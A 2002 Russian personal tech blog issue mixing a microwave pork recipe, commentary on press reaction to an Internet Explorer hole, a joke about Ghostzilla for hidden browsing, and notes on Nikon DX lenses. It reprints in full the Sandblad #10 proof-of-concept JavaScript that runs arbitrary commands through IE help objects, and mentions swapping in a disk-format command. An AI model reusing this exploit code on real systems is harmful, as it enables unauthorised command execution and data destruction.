DiBR
обычная кошмарная
домашняя страничка
Ежекакполучится околокомпьютерное обозрение
 
  <<<  предыдущий15 декабря 02 годаследующий  >>>  
   Последний выпуск      Архив      Ссылки      Полезности      humor.filtered      О сайте   
         Заходим на rambler.ru, ищем "еж". Радуемся.
         Локальный "архив" старого dz. Ввиду практической непригодности"официального" архива на dz.yandex.ru для чтения старого dz online.
         
From: dmitry radishevTo:   Dmitry Anokhin
> Здравствуйте, dibr.>> Ээээ... помнится у тебя были оченно-хорошие рецептики для> микроволновки. У тебя не возникала мысль организовать их в некую> "поваренную книгу для микроволновки"?Мысль благополучно удушается ленью (и осознанием того, чтоспециализированные ресурсы типа кукинг.ру всё равно толще), но - хорошо чтонапомнил, держи ещё один рецептик [будет в следующем выпуске] :-)> У нас в организацию купили эту самую микроволновку и что теперь с ней> делать никто не знает. :-)))Хот-доги делать :-)egin{recipe}Микроволновка все-таки отучает и обленяет. Хотя и определенный простор дляэкспериментов и открываний новых велосипедов - даёт.Велосипедов - это неожиданных открытий, вроде того, что "пока мясо ещежесткое - овощи-фрукты уже изменили агрегатное состояние", а экспериментов -это "как бы сделать так, чтобы поменьше делать, и получше получилось".parИтак. За основу берем свинину, запеченную в фольге в духовке. Духовку гневноотбрасываем, как устаревшую и неудобную. Фольгу с сожалением отвергаем, какнепригодную для микроволновки. Рецептуру корректируем с учетом отброшенногои дополняем с учетом где-то когда-то увиденного. В результате получаем.parСвинину режем крупными (крупными я сказал!) кусками. Обмазываем горчицей(правильной горчицей - она такая не горькая но жгучая), посыпаемкакой-нибудь "стандартной специей с перцем для мяса". Дно микроволновойпосуды обмазываем майонезом, сами куски тоже обмазываем нетолстым слоеммайонеза (в основном для защиты от высыхания) и кладем плотно друг к другу.Закрываем крышкой и включаем на полную мощность. Если начинает пениться иплеваться - слегка перекосить крышку, чтобы осталась щель.parПока там шипит и плюется - готовим "соус". Очищаем апельсин. Плюхаеммайонеза. Чуть-чуть солим и добавляем опять же специй. Режем по однойчерносливине и кураге (больше не надо) и плюхаем туда же. Давим пару зубковчеснока. Берем немного сыра и мелко режем. Добавляем водички. Далее -берем миксер с насадкой "порубающей всё на куски", и старательно рубим всеэто до состояния полужидкой трухи. При необходимости (если миксер клинит илипроскальзывает) - чуть-чуть добавить водичики.parШипеть и плеваться должно "до готовности". Готовность определяется позагустению натекшего сока и ощущению "щас сгорит". Ощущение должно бытьконгруэнтным - от "уже готово" до "уже сгорело" проходит буквальнотри-четыре минуты, если же остановить процесс раньше времени - будетжестковато.parВынимаем из микроволновки, разлепляем куски, промазываем-заливаемсвежесделанным соусом, и - возвращаем в микроволновку на 10-15 минут, небольше. Извлекаем и едим!parКак готовить гарнир (рис) - рассказывать не буду, не маленькие. Разумеется,он готовится в микроволновке :-))end{recipe}
         Интересно, как изменяется отношение средств массовой информации к одному и тому же событию в зависимости от того, с какойстороны на него смотреть.
         Какое-то время назад была обнаружена "дыра" в msie, позволяющая запускать программы с локального диска. Реакцияпрессы - "гы-гы-гы, дыра в IE, теперь можно запустить юзеру calc", реакция микрософт - "это не есть security vulnerability, не мешайте работать".Несколько позже метод модифицировали, чтобы иметь возможность запускать программу с локального диска с параметрами.Реакция - "гы-гы-гы, теперь calc можно запустить с параметрами, какая дыра однако!".
         Однако как только кто-то догадался, что "программа с параметрами" может оказаться и " c: /q /u" или что-то подобное,и реально изготовил такой эксплойт (благо "изготовление" свелось к замене одной строчки в готовом эксплойте) -реакция была быстрой и энергичной - "обнаружена серьезнейшая дыра в безопасности IE, спасайся кто может".Хотя дыра-то обнаружена давно, разве что про серьезность сообразили все, кроме журналистов.

          ссылки по теме:эксплойт,статья

INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCRIPT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST START
WITH HTTP://).
4. The script will open up a dos window and display a line of text, create
the file c:/vulnerable.txt (write permission required) and start winmine
(this excellent game must exist). The help window for IE will not be
closed.

TESTED:
Win2000 pro, XP, IE 6 (latest patches).

--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
       'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  open(location+"2").blur();
else {
  f = opener.location.assign;
  opener.location="res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
  setTimeout('run()',1000);
}
function run() {
  f("javascript:document.write('<object id=c1 classid=clsid:adb"+
   "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
   "=ShortCut><param name=Item1 value=","+prog+","+args+""></"+
   "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
   "-00aa003b7a11><param name=Command value=Close></object>')");
  f("javascript:c1.Click();c2.Click();");
  close();
}
</script>
--------------------------- CUT HERE ---------------------------
         http://www.toster.ru/740/.
         Грамотный пример, как именно надо использовать современные технологии по интеграции приложений и организации ихвзамодействия "на лету". OLE, Edit-in-place и прочее - фигня, пользователю более полезно другое.
         Имеем приложение. В приложении имеем окно. В окне мы работаем в рабочее время.
         Имеем браузер. В него мы хотим ходить и в рабочее время, но браузер слабо похож на окно приложения, в котором мы должны работатьв рабочее время, поэтому в браузер в рабочее время ходить получается плохо, и приходится ходить в окно приложения,в котором мы должны работать в рабочее время. Короче - работать надо, а не в браузеры ходить!
         Имеем мышь, браузер, и софтину под названием ghostzilla. Сделав мышью кодовое движение, софтина открываетбраузер (без излишеств, могущих привлечь внимание) прямо в окне текущего приложения, не изменяя "оформления"собственно окна и уж тем более - приложения. При уводе мышиза пределы окна текущего приложения - браузер тихо исчезает, и появляется то, что раньше было в окне приложения.Тем самым позволяя нам, с одной стороны, ходить в браузер прямо в окне того приложения, в котором нам положеноработать в рабочее время (тем самым не привлекая к себе лишнего внимания), а с другой стороны - в случае таки привлечения излишнеговнимания, быстро и непринужденно сделать вид, что ничего и не было.
         Короче, бездельничать не отходя от ворда, бисибилдера, или в чем вы там работаете. И именно так и надо использовать современныетехнологии по интеграции... ну, вы поняли :-)
         У цифровой фотографии на её современном этапе развития есть одна неприятная особенность. Особенность называется"размер матрицы" - этот самый размер матрицы на данный момент ну очень сложно "догнать" до размера "пленочного"кадра - то есть, догнать-то догнали, но пока за весьма неразумные деньги. В большинстве же своемматрички в цифровиках имеют размер в несколько миллиметров. Что, в принципе, не так уж и плохо (например,светосильная оптика получается не размером с небольшой гранатомет, а скорее с небольшую гранату), но имеет и свои недостатки.
         Недостаток номер раз - мелкий размер матрицы обуславливает небольшое фокусное расстояние, а небольшое фокусное - даетбольшую глубину резкости. Для "мыльницы" оно даже и хорошо (можно схалявить с фокусировкой - все равно будет резко),но вот скажем "классический портрет" (с размытым фоном) снять уже практически невозможно, да и вообще игры сразмытостью становятся сложными.
         Недостаток номер два - отсутствие сменной оптики. Поскольку с одной стороны стандарта на оптику для "мелкой" матрицы нет(цифра-то не так давно добралась до профессионального рынка), с другой стороны - производители не особо спешатэтот стандарт делать - "парк" оптики для пленочных камер уже есть, заставить пользователя закупать зановокучу стекла - малореально, а размеры матриц таки растут потихоньку, глядишь, когда-нибудь и дорастут до полного кадра.Тогда профессионалам удастся сохранить старый "парк" оптики, и ограничиться покупкой "тушки". Только вотпро полноразмерную матрицу пока много разговоров, но мало результатов. Они есть, но стОят...
         Зеркальные ("зеркальность" сама по себе тут не при чем, это некий показатель сменности оптики) цифровые камерывыпускаются уже давно. Но - с матрицами, раза так в полтора меньшими кадра. Что, конечно,не фатально, но несколько "сдвигает" имеющиеся объективы в длиннофокусную сторону. В частности - лишаяфотографа широкоугольных объективов, ведь широкоугольный объектив с 28мм фокусного - на "уполторённой" матрице оказываетсяпо углу зрения уже 42-миллиметровым. А значит - фотографы будут "плакать, колоться, но продолжать есть кактус" -ждать полноразмерной матрицы, и тем временем страдать без wide-объективов.

         ...Nikon выкатил новый объектив. Читать здесь издесь.Сначала (до официального объявления Никоном) его даже посчитали "приколом" - странные фокусные расстояния,странный префикс "DX". Однако - факт.Новый объектив специально создан для зеркальных цифровиков с "мелкой" матрицей (можно, конечно, его одеть ина пленочный - но на краях кадра хорошая картинка не гарантируется). А значит,никон дает понять, что зеркальная цифровая камера с полноразмерным сенсором - пока откладывается,а учитывая обещание выпустить целую серию объективов DX - похоже, что никон тем самым признается,что в ближайшие несколько лет недорогой DSLR с полноразмерным сенсором ждать не придется.
         Кроме того, из "частной переписки" (это не официальное заявление Никона, но всё-таки):

Area: RU.PHOTO.DIGITAL
From: Iliah Borg
To: Eugeny Kreewosheyew
Subj: Японский юмор
[skip] Hа Фотокине Nikon'овцы говорили, что размер сенсораменять в обозримом будущем не будут, а вместо этого выпустят новую линейкуоптики высокого разрешения. Это был разговор частный. Теперь мы имеем реальнозаявленный объектив (утверждается, что его разрешение выше *200* пар линий намм) и обещания в феврале (в Лас-Вегасе) продемонстрировать чуть ли не готовуюлинейку.


         Впрочем, может оно и правильно. Меньший в полтора раза сенсор - не мешает играться с резкостью/нерезкостью,вполне достаточен по разрешению/чувствительности, зато оптика на него заметно легче, а сам сенсор - сильно дешевле...
         Ну, и еще немного об объективах. Смотретьсюда.Чуть заметная хреновинка, прицепленная справа на самом нижнем объективе - это фотоаппарат :-) Остальное -собственно, объектив.






Архив dibr